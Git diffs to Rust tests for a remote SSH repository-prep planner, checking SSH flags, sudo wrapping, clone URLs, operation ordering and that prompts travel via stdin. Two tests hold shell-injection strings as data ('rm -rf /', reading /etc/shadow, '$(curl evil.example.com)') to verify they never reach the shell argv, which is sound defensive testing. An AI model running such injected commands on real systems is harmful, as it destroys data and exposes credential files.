+++ b/src/app_input/issue_prep_remote_tests.rs
@@ -25,6 +25,19 @@ impl<T> TestOptionExt<T> for Option<T> {
     }
 }
 
+trait TestResultExt<T> {
+    fn value_or_panic(self, context: &str) -> T;
+}
+
+impl<T, E: std::fmt::Debug> TestResultExt<T> for Result<T, E> {
+    fn value_or_panic(self, context: &str) -> T {
+        match self {
+            Ok(value) => value,
+            Err(error) => panic!("{context}: {error:?}"),
+        }
+    }
+}
+
 /// Standard work dir used by the planner tests.
 const PLAN_WORK_DIR: &str = "/home/acoliver/work";
 
@@ -76,15 +89,17 @@ fn local_target_when_enabled_but_host_missing() {
 #[test]
 fn plan_uses_ssh_t_not_tt() {
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "do the work",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "do the work",
+        })
+        .value_or_panic("plan");
     assert!(!ops.is_empty());
     for op in &ops {
         assert!(
@@ -103,15 +118,17 @@ fn plan_uses_ssh_t_not_tt() {
 #[test]
 fn plan_targets_remote_host_user() {
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "do the work",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "do the work",
+        })
+        .value_or_panic("plan");
     assert!(!ops.is_empty());
     for op in &ops {
         assert!(
@@ -125,15 +142,17 @@ fn plan_targets_remote_host_user() {
 #[test]
 fn plan_applies_run_as_user() {
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "do the work",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "do the work",
+        })
+        .value_or_panic("plan");
     // run_as_user=acoliver differs from login_user=ubuntu → every command
     // is wrapped in `sudo -n su - acoliver -c`.
     for op in &ops {
@@ -155,15 +174,17 @@ fn plan_applies_run_as_user() {
 fn plan_prompt_transferred_via_stdin_not_shell() {
     let adversarial = "'; rm -rf /; echo '";
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: adversarial,
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: adversarial,
+        })
+        .value_or_panic("plan");
     // The final op writes the prompt via stdin.
     let prompt_op = ops
         .iter()
@@ -189,15 +210,17 @@ fn plan_does_not_create_local_workdir() {
         .join("target/tmp/issue_prep_should_not_create_this");
     let _ = std::fs::remove_dir_all(&local_marker);
     let planner = RemotePrepPlanner::new(remote_settings());
-    let _ops = planner.plan(&PlanInputs {
-        work_dir: &local_marker,
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "prompt",
-    });
+    let _ops = planner
+        .plan(&PlanInputs {
+            work_dir: &local_marker,
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "prompt",
+        })
+        .value_or_panic("plan");
     assert!(
         !local_marker.exists(),
         "remote planner must not create local directories"
@@ -207,15 +230,17 @@ fn plan_does_not_create_local_workdir() {
 #[test]
 fn plan_dirty_stop_emits_no_cleanup() {
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: true,
-        origin_mismatch: false,
-        prompt: "prompt",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: true,
+            origin_mismatch: false,
+            prompt: "prompt",
+        })
+        .value_or_panic("plan");
     // Dirty + Stop: the planner short-circuits with NO operations at all —
     // no reset/clean, no checkout, no prompt write. Assert emptiness directly
     // (not a vacuous `.all()`) so an accidental no-op/log op would be caught.
@@ -228,15 +253,17 @@ fn plan_dirty_stop_emits_no_cleanup() {
 #[test]
 fn plan_dirty_discard_emits_cleanup_then_prep() {
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Discard,
-        presence: WorkdirPresence::Git,
-        is_dirty: true,
-        origin_mismatch: false,
-        prompt: "prompt",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Discard,
+            presence: WorkdirPresence::Git,
+            is_dirty: true,
+            origin_mismatch: false,
+            prompt: "prompt",
+        })
+        .value_or_panic("plan");
     // Discard: reset --hard + clean -fd first, then checkout, then prompt.
     let reset_idx = ops
         .iter()
@@ -257,15 +284,17 @@ fn plan_dirty_discard_emits_cleanup_then_prep() {
 #[test]
 fn plan_clone_when_missing() {
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Absent,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "prompt",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Absent,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "prompt",
+        })
+        .value_or_panic("plan");
     assert!(
         ops.iter()
             .any(|op| op.ssh_argv.iter().any(|a| a.contains("git clone"))),
@@ -288,15 +317,17 @@ fn plan_absent_without_identity_emits_no_ops() {
     // ops — it must not plan checkout/prompt-write operations against a
     // path that was never created.
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: None,
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Absent,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "prompt",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: None,
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Absent,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "prompt",
+        })
+        .value_or_panic("plan");
     assert!(
         ops.is_empty(),
         "absent workdir with no identity must emit no ops: {ops:?}"
@@ -308,15 +339,17 @@ fn plan_https_url_regardless_of_remote_enabled() {
     // Remote is enabled but clone URL must still be HTTPS (no SSH
     // inference from remote.enabled).
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Absent,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "prompt",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Absent,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "prompt",
+        })
+        .value_or_panic("plan");
     let clone_op = ops
         .iter()
         .find(|op| op.ssh_argv.iter().any(|a| a.contains("git clone")))
@@ -342,15 +375,17 @@ fn plan_origin_mismatch_short_circuits() {
     // PlanInputs with origin_mismatch=true must short-circuit: no
     // checkout/pull/prompt op planned, mirroring Dirty+Stop.
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: true,
-        prompt: "prompt",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: true,
+            prompt: "prompt",
+        })
+        .value_or_panic("plan");
     assert!(
         ops.is_empty(),
         "origin mismatch must short-circuit with no ops: {ops:?}"
@@ -414,6 +449,34 @@ fn plan_force_reclone_resolves_url_before_rm() {
     );
 }
 
+#[test]
+fn plan_not_git_is_a_hard_error_not_empty() {
+    // An existing path that is NOT a git worktree is a hard error in the live
+    // runner. The planner must encode that as Err (mirroring the runner),
+    // NOT silently emit an empty plan, so a planner/runner divergence would
+    // be caught by tests.
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let result = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::NotGit,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "prompt",
+    });
+    assert!(result.is_err(), "NotGit must be a hard error: {result:?}");
+    let err = match result {
+        Err(reason) => reason,
+        Ok(ops) => panic!("expected Err, got ops: {ops:?}"),
+    };
+    // The static reason mentions the non-git-worktree condition.
+    assert!(
+        err.contains("not a git worktree"),
+        "error must explain non-git worktree: {err}"
+    );
+}
+
 // ── Target-aware PR prompt writing (reuses write_prompt_to_target) ──────
 
 /// A remote PR prompt write plans `ssh -T` with prompt bytes via stdin,
@@ -424,15 +487,17 @@ fn plan_force_reclone_resolves_url_before_rm() {
 fn pr_prompt_remote_plan_transfers_prompt_via_stdin_not_shell() {
     let adversarial = "'; cat /etc/shadow; echo '\n$(curl evil.example.com)";
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: Some(&identity()),
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: adversarial,
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: Some(&identity()),
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: adversarial,
+        })
+        .value_or_panic("plan");
     // The final op writes the prompt via stdin.
     let prompt_op = ops
         .iter()
@@ -469,15 +534,17 @@ fn pr_prompt_remote_plan_transfers_prompt_via_stdin_not_shell() {
 #[test]
 fn pr_prompt_remote_target_is_correct_ssh_t_host() {
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan(&PlanInputs {
-        work_dir: Path::new(PLAN_WORK_DIR),
-        identity: None,
-        policy: DirtyPolicy::Stop,
-        presence: WorkdirPresence::Git,
-        is_dirty: false,
-        origin_mismatch: false,
-        prompt: "PR prompt",
-    });
+    let ops = planner
+        .plan(&PlanInputs {
+            work_dir: Path::new(PLAN_WORK_DIR),
+            identity: None,
+            policy: DirtyPolicy::Stop,
+            presence: WorkdirPresence::Git,
+            is_dirty: false,
+            origin_mismatch: false,
+            prompt: "PR prompt",
+        })
+        .value_or_panic("plan");
     let prompt_op = ops
         .iter()
         .find(|op| op.stdin_prompt.is_some())

--- a/src/app_input/issue_prep_remote_tests.rs
+++ b/src/app_input/issue_prep_remote_tests.rs
@@ -216,13 +216,12 @@ fn plan_dirty_stop_emits_no_cleanup() {
         origin_mismatch: false,
         prompt: "prompt",
     });
-    // Dirty + Stop: no reset/clean, no checkout, no prompt write.
+    // Dirty + Stop: the planner short-circuits with NO operations at all —
+    // no reset/clean, no checkout, no prompt write. Assert emptiness directly
+    // (not a vacuous `.all()`) so an accidental no-op/log op would be caught.
     assert!(
-        ops.iter().all(|op| !op
-            .ssh_argv
-            .iter()
-            .any(|a| a.contains("git reset") || a.contains("git clean"))),
-        "Stop policy must not plan reset/clean: {ops:?}"
+        ops.is_empty(),
+        "Stop policy must emit no ops at all: {ops:?}"
     );
 }
 

--- a/src/app_input/issue_prep_remote_tests.rs
+++ b/src/app_input/issue_prep_remote_tests.rs
@@ -1,0 +1,475 @@
+//! Tests for the remote SSH prep subsystem: the pure `RemotePrepPlanner`
+//! command planning, WorkTarget resolution, and PR prompt remote plan.
+//!
+//! Split from `issue_prep_tests.rs` to keep test files under the 750-line
+//! recommended limit.
+
+use super::super::WorkTarget;
+use super::*;
+use crate::app_input::clone_identity::CloneIdentity;
+
+use std::path::Path;
+
+use jefe::domain::RemoteRepositorySettings;
+
+trait TestOptionExt<T> {
+    fn value_or_panic(self, context: &str) -> T;
+}
+
+impl<T> TestOptionExt<T> for Option<T> {
+    fn value_or_panic(self, context: &str) -> T {
+        match self {
+            Some(value) => value,
+            None => panic!("{context}: expected Some, got None"),
+        }
+    }
+}
+
+/// Standard work dir used by the planner tests.
+const PLAN_WORK_DIR: &str = "/home/acoliver/work";
+
+fn remote_settings() -> RemoteRepositorySettings {
+    RemoteRepositorySettings {
+        enabled: true,
+        login_user: "ubuntu".to_owned(),
+        host: "build.example.com".to_owned(),
+        run_as_user: "acoliver".to_owned(),
+        setup_env_default: false,
+    }
+}
+
+fn identity() -> CloneIdentity {
+    CloneIdentity::parse("acme/widgets").value_or_panic("test fixture identity")
+}
+
+// ── WorkTarget resolution ──────────────────────────────────────────
+
+#[test]
+fn local_target_when_remote_disabled() {
+    let remote = RemoteRepositorySettings::default();
+    assert_eq!(WorkTarget::from_remote(&remote), WorkTarget::Local);
+}
+
+#[test]
+fn remote_target_when_enabled() {
+    let remote = remote_settings();
+    assert!(matches!(
+        WorkTarget::from_remote(&remote),
+        WorkTarget::Remote(_)
+    ));
+}
+
+#[test]
+fn local_target_when_enabled_but_host_missing() {
+    let remote = RemoteRepositorySettings {
+        enabled: true,
+        login_user: "ubuntu".to_owned(),
+        host: String::new(),
+        run_as_user: String::new(),
+        setup_env_default: false,
+    };
+    assert_eq!(WorkTarget::from_remote(&remote), WorkTarget::Local);
+}
+
+// ── RemotePrepPlanner: command planning ────────────────────────────
+
+#[test]
+fn plan_uses_ssh_t_not_tt() {
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "do the work",
+    });
+    assert!(!ops.is_empty());
+    for op in &ops {
+        assert!(
+            op.ssh_argv.iter().any(|a| a == "-T"),
+            "every remote op must use -T (got {:?})",
+            op.ssh_argv
+        );
+        assert!(
+            !op.ssh_argv.iter().any(|a| a == "-tt"),
+            "no remote prep op may use -tt (got {:?})",
+            op.ssh_argv
+        );
+    }
+}
+
+#[test]
+fn plan_targets_remote_host_user() {
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "do the work",
+    });
+    assert!(!ops.is_empty());
+    for op in &ops {
+        assert!(
+            op.ssh_argv.iter().any(|a| a == "ubuntu@build.example.com"),
+            "every op must target ubuntu@build.example.com (got {:?})",
+            op.ssh_argv
+        );
+    }
+}
+
+#[test]
+fn plan_applies_run_as_user() {
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "do the work",
+    });
+    // run_as_user=acoliver differs from login_user=ubuntu → every command
+    // is wrapped in `sudo -n su - acoliver -c`.
+    for op in &ops {
+        let cmd = op
+            .ssh_argv
+            .iter()
+            .find(|a| a.contains("sudo"))
+            .unwrap_or_else(|| {
+                panic!(
+                    "run_as_user must wrap command in sudo -n su - acoliver (got {:?})",
+                    op.ssh_argv
+                )
+            });
+        assert!(cmd.contains("acoliver"), "wrapped command: {cmd}");
+    }
+}
+
+#[test]
+fn plan_prompt_transferred_via_stdin_not_shell() {
+    let adversarial = "'; rm -rf /; echo '";
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: adversarial,
+    });
+    // The final op writes the prompt via stdin.
+    let prompt_op = ops
+        .iter()
+        .find(|op| op.stdin_prompt.is_some())
+        .unwrap_or_else(|| panic!("an op must carry the prompt via stdin (got {ops:?})"));
+    assert_eq!(prompt_op.stdin_prompt.as_deref(), Some(adversarial));
+    // The command string must NOT contain the raw adversarial prompt —
+    // it is transferred via stdin, not interpolated.
+    for arg in &prompt_op.ssh_argv {
+        assert!(
+            !arg.contains("rm -rf"),
+            "adversarial prompt must not appear in shell argv (got {arg})"
+        );
+    }
+}
+
+#[test]
+fn plan_does_not_create_local_workdir() {
+    // The planner is pure: it must never touch the local filesystem.
+    // Verify by pointing at a non-existent local path and checking no
+    // directory was created.
+    let local_marker = std::path::PathBuf::from(env!("CARGO_MANIFEST_DIR"))
+        .join("target/tmp/issue_prep_should_not_create_this");
+    let _ = std::fs::remove_dir_all(&local_marker);
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let _ops = planner.plan(&PlanInputs {
+        work_dir: &local_marker,
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "prompt",
+    });
+    assert!(
+        !local_marker.exists(),
+        "remote planner must not create local directories"
+    );
+}
+
+#[test]
+fn plan_dirty_stop_emits_no_cleanup() {
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: true,
+        origin_mismatch: false,
+        prompt: "prompt",
+    });
+    // Dirty + Stop: no reset/clean, no checkout, no prompt write.
+    assert!(
+        ops.iter().all(|op| !op
+            .ssh_argv
+            .iter()
+            .any(|a| a.contains("git reset") || a.contains("git clean"))),
+        "Stop policy must not plan reset/clean: {ops:?}"
+    );
+}
+
+#[test]
+fn plan_dirty_discard_emits_cleanup_then_prep() {
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Discard,
+        presence: WorkdirPresence::Git,
+        is_dirty: true,
+        origin_mismatch: false,
+        prompt: "prompt",
+    });
+    // Discard: reset --hard + clean -fd first, then checkout, then prompt.
+    let reset_idx = ops
+        .iter()
+        .position(|op| op.ssh_argv.iter().any(|a| a.contains("git reset")))
+        .value_or_panic("a reset op must be planned");
+    let checkout_idx = ops
+        .iter()
+        .position(|op| op.ssh_argv.iter().any(|a| a.contains("git checkout")))
+        .value_or_panic("a checkout op must be planned");
+    let prompt_idx = ops
+        .iter()
+        .position(|op| op.stdin_prompt.is_some())
+        .value_or_panic("a prompt-write op must be planned");
+    assert!(reset_idx < checkout_idx, "reset before checkout");
+    assert!(checkout_idx < prompt_idx, "checkout before prompt write");
+}
+
+#[test]
+fn plan_clone_when_missing() {
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Absent,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "prompt",
+    });
+    assert!(
+        ops.iter()
+            .any(|op| op.ssh_argv.iter().any(|a| a.contains("git clone"))),
+        "missing worktree must plan a clone: {ops:?}"
+    );
+    // Clone uses the canonical HTTPS URL.
+    assert!(
+        ops.iter().any(|op| op
+            .ssh_argv
+            .iter()
+            .any(|a| a.contains("https://github.com/acme/widgets.git"))),
+        "clone must use canonical HTTPS URL: {ops:?}"
+    );
+}
+
+#[test]
+fn plan_https_url_regardless_of_remote_enabled() {
+    // Remote is enabled but clone URL must still be HTTPS (no SSH
+    // inference from remote.enabled).
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Absent,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "prompt",
+    });
+    let clone_op = ops
+        .iter()
+        .find(|op| op.ssh_argv.iter().any(|a| a.contains("git clone")))
+        .unwrap_or_else(|| panic!("expected a clone op: {ops:?}"));
+    assert!(
+        clone_op
+            .ssh_argv
+            .iter()
+            .any(|a| a.contains("https://github.com/")),
+        "clone must use HTTPS even when remote enabled: {clone_op:?}"
+    );
+    assert!(
+        clone_op
+            .ssh_argv
+            .iter()
+            .all(|a| !a.contains("git@github.com")),
+        "clone must not use SSH form: {clone_op:?}"
+    );
+}
+
+#[test]
+fn plan_origin_mismatch_short_circuits() {
+    // PlanInputs with origin_mismatch=true must short-circuit: no
+    // checkout/pull/prompt op planned, mirroring Dirty+Stop.
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: true,
+        prompt: "prompt",
+    });
+    assert!(
+        ops.is_empty(),
+        "origin mismatch must short-circuit with no ops: {ops:?}"
+    );
+}
+
+// ── RemotePrepPlanner: force-reclone (MUST-FIX #2) ──────────────────
+
+#[test]
+fn plan_force_reclone_resolves_url_before_rm() {
+    // The force-reclone plan must resolve the clone URL from the identity
+    // BEFORE the rm -rf. The clone URL must appear in a planned op, and the
+    // rm must precede the clone (ordering invariant: identity → rm → clone).
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan_force_reclone(Path::new(PLAN_WORK_DIR), &identity(), "prompt");
+
+    // Find the rm and clone ops by their position in the plan.
+    let rm_idx = ops
+        .iter()
+        .position(|op| op.ssh_argv.iter().any(|a| a.contains("rm -rf")))
+        .value_or_panic("a rm -rf op must be planned");
+    let clone_idx = ops
+        .iter()
+        .position(|op| op.ssh_argv.iter().any(|a| a.contains("git clone")))
+        .value_or_panic("a clone op must be planned");
+
+    // rm must come before clone.
+    assert!(
+        rm_idx < clone_idx,
+        "rm must precede clone in force-reclone plan: {ops:?}"
+    );
+
+    // The clone op must use the HTTPS URL from the identity.
+    let clone_op = &ops[clone_idx];
+    assert!(
+        clone_op
+            .ssh_argv
+            .iter()
+            .any(|a| a.contains("https://github.com/acme/widgets.git")),
+        "force-reclone must use the identity's HTTPS clone URL: {clone_op:?}"
+    );
+
+    // A checkout op must follow the clone.
+    let checkout_idx = ops
+        .iter()
+        .position(|op| op.ssh_argv.iter().any(|a| a.contains("git checkout")))
+        .value_or_panic("a checkout op must be planned");
+    assert!(
+        clone_idx < checkout_idx,
+        "clone must precede checkout: {ops:?}"
+    );
+
+    // A prompt-write op (stdin) must follow the checkout.
+    let prompt_idx = ops
+        .iter()
+        .position(|op| op.stdin_prompt.is_some())
+        .value_or_panic("a prompt-write op must be planned");
+    assert!(
+        checkout_idx < prompt_idx,
+        "checkout must precede prompt write: {ops:?}"
+    );
+}
+
+// ── Target-aware PR prompt writing (reuses write_prompt_to_target) ──────
+
+/// A remote PR prompt write plans `ssh -T` with prompt bytes via stdin,
+/// transferring adversarial content WITHOUT it appearing in the shell argv.
+/// This uses the pure `RemotePrepPlanner` so no SSH connection is made — it
+/// records the planned operation.
+#[test]
+fn pr_prompt_remote_plan_transfers_prompt_via_stdin_not_shell() {
+    let adversarial = "'; cat /etc/shadow; echo '\n$(curl evil.example.com)";
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: Some(&identity()),
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: adversarial,
+    });
+    // The final op writes the prompt via stdin.
+    let prompt_op = ops
+        .iter()
+        .find(|op| op.stdin_prompt.is_some())
+        .unwrap_or_else(|| panic!("an op must carry the prompt via stdin (got {ops:?})"));
+    assert_eq!(prompt_op.stdin_prompt.as_deref(), Some(adversarial));
+    // The command argv must NOT contain the raw adversarial prompt.
+    for arg in &prompt_op.ssh_argv {
+        assert!(
+            !arg.contains("/etc/shadow"),
+            "adversarial prompt must not appear in shell argv (got {arg})"
+        );
+        assert!(
+            !arg.contains("evil.example.com"),
+            "adversarial URL must not appear in shell argv (got {arg})"
+        );
+    }
+    // The prompt file path in the argv must be the issue prompt path (the
+    // planner hardcodes it); the PR path uses `write_prompt_to_target`
+    // directly at runtime.
+    assert!(
+        prompt_op
+            .ssh_argv
+            .iter()
+            .any(|a| a.contains(".jefe/issue-prompt.md")),
+        "planned prompt op writes to .jefe/issue-prompt.md"
+    );
+}
+
+/// The remote PR prompt write (via `write_prompt_to_target`) delegates to the
+/// same `RemotePrepRunner::write_prompt` that the issue path uses. Since the
+/// runner is not exposed for direct testing, this verifies the planner's
+/// generic prompt-write op uses `ssh -T` and targets the correct host.
+#[test]
+fn pr_prompt_remote_target_is_correct_ssh_t_host() {
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: None,
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Git,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "PR prompt",
+    });
+    let prompt_op = ops
+        .iter()
+        .find(|op| op.stdin_prompt.is_some())
+        .unwrap_or_else(|| panic!("prompt op must exist: {ops:?}"));
+    assert!(
+        prompt_op.ssh_argv.iter().any(|a| a == "-T"),
+        "PR prompt remote op must use -T"
+    );
+    assert!(
+        prompt_op
+            .ssh_argv
+            .iter()
+            .any(|a| a == "ubuntu@build.example.com"),
+        "PR prompt remote op must target ubuntu@build.example.com"
+    );
+}

--- a/src/app_input/issue_prep_remote_tests.rs
+++ b/src/app_input/issue_prep_remote_tests.rs
@@ -283,6 +283,28 @@ fn plan_clone_when_missing() {
 }
 
 #[test]
+fn plan_absent_without_identity_emits_no_ops() {
+    // When the workdir is absent AND no clone identity is available, the
+    // live runner returns Err. The planner must mirror that by emitting NO
+    // ops — it must not plan checkout/prompt-write operations against a
+    // path that was never created.
+    let planner = RemotePrepPlanner::new(remote_settings());
+    let ops = planner.plan(&PlanInputs {
+        work_dir: Path::new(PLAN_WORK_DIR),
+        identity: None,
+        policy: DirtyPolicy::Stop,
+        presence: WorkdirPresence::Absent,
+        is_dirty: false,
+        origin_mismatch: false,
+        prompt: "prompt",
+    });
+    assert!(
+        ops.is_empty(),
+        "absent workdir with no identity must emit no ops: {ops:?}"
+    );
+}
+
+#[test]
 fn plan_https_url_regardless_of_remote_enabled() {
     // Remote is enabled but clone URL must still be HTTPS (no SSH
     // inference from remote.enabled).

--- a/src/app_input/issue_prep_tests.rs
+++ b/src/app_input/issue_prep_tests.rs
@@ -471,13 +471,13 @@ fn local_force_reclone_replaces_mismatched_repo() {
     cleanup(&work);
 }
 
-// ── Target-aware PR prompt writing (reuses write_prompt_to_target) ──────
+// ── Local PR prompt writing (reuses write_prompt_to_target) ────────────
 //
 // The PR send path (`prs_orchestration::dispatch_pr_agent_chooser_confirm`)
 // reuses the issue-prep safe target prompt writer for writing
-// `.jefe/pr-prompt.md` to the local filesystem or a remote host. These tests
